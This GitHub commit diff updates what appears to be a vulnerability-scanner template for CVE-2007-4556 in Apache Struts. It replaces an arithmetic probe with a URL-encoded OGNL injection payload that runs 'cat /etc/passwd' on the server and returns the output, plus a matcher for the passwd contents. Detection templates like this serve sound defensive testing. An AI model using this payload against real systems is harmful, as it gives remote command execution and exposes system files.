update payloads CVE-2007-4556 🛠

patch-1
PikPikcU 2021-02-23 02:37:32 +00:00 committed by GitHub
parent 3be6ea99fd
commit 7eff3819e8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 4 deletions


@ -14,14 +14,14 @@ requests:
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=test&password=%25%7B123456789*987654321%7D
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:
- type: word
words:
- "-67153019"
- type: regex
regex:
- "root:[x*]:0:0"
condition: and
- type: status